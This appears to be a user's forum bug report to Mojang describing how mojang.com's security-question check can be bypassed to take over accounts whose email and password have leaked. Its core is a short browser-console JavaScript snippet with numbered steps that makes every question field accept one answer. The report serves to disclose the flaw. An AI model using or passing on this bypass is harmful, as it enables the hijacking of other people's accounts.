Account stolen
Hello my name is Sebastian and I have quite a serious bug related to your site mojang.com the idea is that you can hack on someone's account knowing the answer only to 1 question which very much you can guess a lot of accounts have been thus taken away from their rightful owners
Maybe now I explain what is going on if you log in to someone's account knowing email: the password can be very easily done because it is multiplier of such accounts on page leakages
1. We enter an account and click on f12, we see there, we enter there : var pytanie = X;
for(var i of document.getElementsByTagName('input')) {
if(i.name.search('question') != -1) {
i.value = document.getElementsByName(`questionId${pytanie-1}`)[0].value;
}
}
X-number of questions 1/2/3
and click enter , now we enter the answer to this question in all fields
and we loggin to account we have right to change password and nickname